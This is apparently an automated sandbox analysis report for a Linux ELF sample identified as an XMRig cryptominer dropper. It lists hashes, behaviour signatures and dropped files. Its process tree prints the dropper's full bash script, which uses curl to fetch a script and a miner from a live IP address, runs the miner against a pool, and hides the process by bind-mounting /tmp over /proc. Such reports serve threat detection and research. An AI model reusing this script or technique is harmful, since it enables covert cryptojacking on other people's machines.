Analysis

  • max time kernel
    149s
  • max time network
    150s
  • platform
    ubuntu-22.04_amd64
  • resource
    ubuntu2204-amd64-20240611-en
  • resource tags

    arch:amd64, arch:i386, image:ubuntu2204-amd64-20240611-en, kernel:5.15.0-105-generic, locale:en-us, os:ubuntu-22.04-amd64, system
  • submitted
    18/10/2024, 01:38

General

  • Target

    481f0641074b3307b21a264987be6c2ba24c76f206334f97ccbac1cf50993282.elf

  • Size

    15KB

  • MD5

    aee014a523b65c8d3b7bdb92765d305c

  • SHA1

    dfb9d0cada5cf03c3dfa4479865955311e6a54f9

  • SHA256

    481f0641074b3307b21a264987be6c2ba24c76f206334f97ccbac1cf50993282

  • SHA512

    4b9d43d58bd6ff61dc563d55dea121f94040ab24137154f2dfe03b342c8ae96676ca438302ff7d63b68d4e34bb8bcdd94909cb56002d3feef73820ca8b3969d8

  • SSDEEP

    384:Zr+Ken0Xvn/3PHfXvn/3PHfayqC6UNwA42KW9XxqZeMm:s90Xvn/3PHfXvn/3PHfayqC6U+6XxqgR

Malware Config

Signatures

  • XMRig Miner payload 2 IoCs
  • xmrig

    XMRig is a high-performance, open-source, cross-platform CPU/GPU miner.

  • File and Directory Permissions Modification 1 TTPs 3 IoCs

    Adversaries may modify file or directory permissions to evade defenses.

  • Executes dropped EXE 1 IoCs
  • Checks hardware identifiers (DMI) 1 TTPs 4 IoCs

    Checks DMI information that indicates whether the system is a virtual machine.

  • Enumerates running processes

    Discovers information about currently running processes on the system

  • Reads hardware information 1 TTPs 14 IoCs

    Accesses system info like serial numbers, manufacturer names etc.

  • Checks CPU configuration 1 TTPs 2 IoCs

    Checks CPU information that indicates whether the system is a virtual machine.

  • Reads CPU attributes 1 TTPs 46 IoCs
  • Enumerates kernel/hardware configuration 1 TTPs 27 IoCs

    Reads contents of /sys virtual filesystem to enumerate system information.

  • Reads runtime system information 64 IoCs

    Reads data from /proc virtual filesystem.

Processes

  • /tmp/481f0641074b3307b21a264987be6c2ba24c76f206334f97ccbac1cf50993282.elf
    /tmp/481f0641074b3307b21a264987be6c2ba24c76f206334f97ccbac1cf50993282.elf
    PID:1604
    • /bin/bash
      /tmp/481f0641074b3307b21a264987be6c2ba24c76f206334f97ccbac1cf50993282.elf -c "exec '/tmp/481f0641074b3307b21a264987be6c2ba24c76f206334f97ccbac1cf50993282.elf' \"\$@\"" /tmp/481f0641074b3307b21a264987be6c2ba24c76f206334f97ccbac1cf50993282.elf
      PID:1604
      • /tmp/481f0641074b3307b21a264987be6c2ba24c76f206334f97ccbac1cf50993282.elf
        /tmp/481f0641074b3307b21a264987be6c2ba24c76f206334f97ccbac1cf50993282.elf
        PID:1604
        • /bin/bash
          /tmp/481f0641074b3307b21a264987be6c2ba24c76f206334f97ccbac1cf50993282.elf -c " #!/bin/bash cpu_num=`grep -c \"model name\" /proc/cpuinfo` cpu_used=`expr \$cpu_num / 2` #echo \$s dir=\$(pwd) if [ `whoami` = \"root\" ];then cd ~ && mkdir .sysemd >/dev/null 2>&1 cd .sysemd >/dev/null 2>&1 rm -f go.sh sysemd >/dev/null 2>&1 n=\$(cat .num) kill -9 \$n >/dev/null 2>&1 curl -s http://104.168.101.23:1234/crack/go.sh -o go.sh && chmod +x go.sh sleep 1 sed -i \"3s/20/\${cpu_used}/\" go.sh curl -s http://104.168.101.23:1234/crack/sysemd -o sysemd && chmod +x sysemd sleep 1 sh go.sh sleep 3 pid=\$(top -b -n1 | grep sysemd | head -1 | awk '{print \$1}') echo \$pid > .num mount -o bind /tmp /proc/\$pid >/dev/null 2>&1 rm -f go.sh sysemd >/dev/null 2>&1 fi " /tmp/481f0641074b3307b21a264987be6c2ba24c76f206334f97ccbac1cf50993282.elf
          • File and Directory Permissions Modification
          PID:1604
          • /usr/bin/grep
            grep -c "model name" /proc/cpuinfo
            • Checks CPU configuration
            PID:1605
          • /usr/bin/expr
            expr 1 / 2
            PID:1606
          • /usr/bin/whoami
            whoami
            PID:1608
          • /usr/bin/mkdir
            mkdir .sysemd
            PID:1609
          • /usr/bin/rm
            rm -f go.sh sysemd
            PID:1610
          • /usr/bin/cat
            cat .num
            PID:1611
          • /usr/bin/curl
            curl -s http://104.168.101.23:1234/crack/go.sh -o go.sh
            PID:1612
          • /usr/bin/chmod
            chmod +x go.sh
            • File and Directory Permissions Modification
            PID:1616
          • /usr/bin/sleep
            sleep 1
            PID:1617
          • /usr/bin/sed
            sed -i 3s/20/0/ go.sh
            PID:1618
          • /usr/bin/curl
            curl -s http://104.168.101.23:1234/crack/sysemd -o sysemd
            PID:1619
          • /usr/bin/chmod
            chmod +x sysemd
            • File and Directory Permissions Modification
            PID:1628
          • /usr/bin/sleep
            sleep 1
            PID:1629
          • /usr/bin/sh
            sh go.sh
            PID:1630
            • /root/.sysemd/sysemd
              ./sysemd -o 104.168.101.23:34512 -t 0 -p xm3 --randomx-1gb-pages -k -B
              • Executes dropped EXE
              • Checks hardware identifiers (DMI)
              • Reads hardware information
              • Checks CPU configuration
              • Reads CPU attributes
              • Enumerates kernel/hardware configuration
              PID:1631
          • /usr/bin/sleep
            sleep 3
            PID:1633
          • /usr/bin/grep
            grep sysemd
            PID:1642
          • /usr/bin/top
            top -b -n1
            • Reads CPU attributes
            • Enumerates kernel/hardware configuration
            • Reads runtime system information
            PID:1641
          • /usr/bin/head
            head -1
            PID:1643
          • /usr/bin/awk
            awk "{print \$1}"
            PID:1644
          • /usr/bin/mount
            mount -o bind /tmp /proc/1632
            PID:1645
          • /usr/bin/rm
            rm -f go.sh sysemd
            PID:1647

Network

MITRE ATT&CK Enterprise v15

Downloads

  • /root/.sysemd/.num

    Filesize

    5B

    MD5

    679359fe74d809a6564f60e75585ed3b

    SHA1

    7f114e9dc091154c365576d4702a63392f88704e

    SHA256

    d05dd95f7ec068988015cb6c4536510191eaba0ebbd7a6c9feb55c73650cc698

    SHA512

    9b493b0a9a67bcb95df947fc628ab7366ed6f5136267782dc0c967063244b5e4acacc32a22242b8fc506f22cdfe91eb802165e4c7d12e07de79563453f3e05a7

  • /root/.sysemd/go.sh

    Filesize

    87B

    MD5

    496b34eb065a5f2a4b2455f207d890b2

    SHA1

    dc170fb3d571ef0b238e33fcae8c2bc50e1e4fd1

    SHA256

    728055874a80558d3900fded78c97584d4728e1bd9124db9d20b8953edacb8c4

    SHA512

    f9774855d64f46b232f93601430db18bd470067372a09c3933d19ca19658eb21d9c6d4f4d1ef49a7e1d0526e6f67d40d9e33e54c8f0867050c0d348635b19e47

  • /root/.sysemd/sedK5Ug6t

    Filesize

    86B

    MD5

    6bcf2d2ea1ceb1766c5bfbf8728a57e3

    SHA1

    e542eee55d92c4f5e3fbb86c244edf04afdfee22

    SHA256

    53bff9f21bdaa669c662f3d9c3a4d7f236e063f75ce418874d55674ea6125796

    SHA512

    00d0dd6643a22d7e63a559a5dd7f48cd61f26a5c214e308fbd3dcb6a1238d553f89f7af51a92465004b117b9cd08c1df2c2e46875f5a8f61ed467dc87cd9b598

  • /root/.sysemd/sysemd

    Filesize

    6.7MB

    MD5

    8f633ade35df4f992eb28a2c5bc37cef

    SHA1

    6b2fe529339896b22328dec8936219e7b8e3252f

    SHA256

    364a7f8e3701a340400d77795512c18f680ee67e178880e1bb1fcda36ddbc12c

    SHA512

    8073ded4e0b5d6333ecb0b324cf09c023dfa99c6110ad6f86225f1a4b9a0dcdf88bd094da9c920a8b729c020990dba9f263481030dec463ab9fbc41cba050c73